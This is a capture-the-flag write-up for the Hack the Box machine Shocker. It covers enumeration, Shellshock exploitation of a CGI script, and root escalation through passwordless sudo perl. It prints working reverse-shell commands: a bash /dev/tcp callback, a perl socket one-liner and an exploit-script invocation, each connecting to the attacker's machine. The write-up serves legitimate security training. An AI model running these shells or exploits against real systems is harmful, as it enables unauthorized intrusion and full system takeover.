Hack the Box Writeup - Shocker

This post is a guide to the retired Hack the Box system, Shocker. It takes us from initial enumeration all the way through to gaining a root shell.


Today's post will take us through one of the easier retired boxes on Hack the Box: Shocker.

The IP address of the box is 10.10.10.56, so, as always, let's start with our initial enumeration.

Enumeration

We begin with nmap.

$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.56

The flags break down as follows:

  • -sC : run the default NSE script set against each open port
  • -sV : probe each open port to identify the service and version running on it
  • -p- : scan all 65535 TCP ports rather than nmap's default top 1000
  • -oA : save the output in all three formats (normal, greppable and XML) under the nmap/initial basename

This gives us the following results:

(screenshot: nmap_scan)

As you can see we have two ports open: port 80 running Apache httpd, and port 2222, a non-standard port that nmap identifies as SSH. The SSH service is worth noting for later, but with no credentials the web server is the obvious place to start.

Running curl on port 80 returns us the following HTML:

<!DOCTYPE html>
<html>
<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html>

So port 80 is serving a real, if minimal, website; let's dig into it with gobuster to find what else is on the server.

$ gobuster -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50

The flags are for the following settings:

  • -u : the URL of the host we wish to scan
  • -w : which word-list we want to use
  • -s : the response status codes we want to know about
  • -x : the file extensions we wish to check each entry of our word-list with
  • -t : the number of threads to run to speed things up a little bit

This finishes quite quickly with the following results:

(screenshot: gobuster_results)

We can see that there is a cgi-bin directory returning a 403 Forbidden. That response only means Apache refuses to list the directory itself; scripts inside it can still be requested and executed, which is why the scan includes the cgi, sh and pl extensions. So let's run gobuster again, this time starting in the cgi-bin directory.

$ gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50

Again, the results come back quite quickly, showing us a shell script called user.sh.

(screenshot: gobuster_results2)

We can run curl on the newly found URL to verify it.

$ curl http://10.10.10.56/cgi-bin/user.sh

The response is generated dynamically rather than served as a static file, so Apache is executing user.sh through its CGI handler, and the .sh extension suggests bash is the interpreter.

(screenshot: cgi_script)

A CGI script executed by bash, plus the hint in the machine's name, points strongly at Shellshock (CVE-2014-6271). Apache's mod_cgi passes request headers such as User-Agent to the script as environment variables, and an unpatched bash, when importing an environment variable that begins with a function definition ("() { :; };"), keeps parsing and executes whatever commands follow the closing brace. Any header we control therefore becomes a way to run commands as the web server's user.

Exploitation

A quick search of exploit-db gives us a likely script we can use.

https://www.exploit-db.com/exploits/34900/

However, looking at the code we can see that we need to pass the script's pages parameter so that it targets the vulnerable CGI script we found rather than guessing at paths itself.

So download the script, start a netcat listener on the port you will use as lport, and run it as follows (changing lhost and lport to match your own machine):

$ python shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4444 pages=/cgi-bin/user.sh

We get a shell, yay! :D

(screenshot: shell)

The id command shows that we are running as the user shelly, and a quick pwd shows that we are not in the home directory, so we change to shelly's home directory to pick up the user flag.

(screenshot: flag)

Getting a Better Shell

Now that we have a basic shell and the user flag, we need to enumerate the system from our new vantage point. First, though, I want a better and more stable shell. Using the very useful reverse shell cheat sheet on pentestmonkey, we set up a netcat listener on our Kali box on a second port and run the following in the basic shell (the IP address is our own machine's):

$ bash -i >& /dev/tcp/10.10.14.15/8888 0>&1

(screenshot: better_shell)

Then we can get a shell capable of job control using the well-known Python pty trick, except that the normal python binary doesn't seem to be on the machine. A quick locate python later, however, shows that python3 is there instead, so we can run the following:

$ python3 -c "import pty; pty.spawn('/bin/bash');"

More Enumeration

With our shiny new, more stable shell, we can begin further enumeration of the box to elevate our privileges to root. One of the first things I check, before running any scripts like LinEnum.sh, is which commands our user is allowed to run through sudo:

$ sudo -l

Which in this case gives us a big win immediately.

(screenshot: sudoers)

Privilege Escalation

This shows us that our current user can run perl as root through sudo without entering a password. Since perl can spawn any process, that is a complete privilege escalation. Referring back to the pentestmonkey cheat sheet we find a perl reverse shell, set up another netcat listener on a different port, and run the one-liner under sudo so that the shell it connects back with is root's. (Because we already have an interactive tty, having perl exec /bin/bash in place would work just as well; the reverse shell simply gives us a clean root session on its own listener.)

$ sudo perl -e 'use Socket;$i="10.10.14.15";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

(screenshot: root_flag)

Winner, winner, chicken dinner!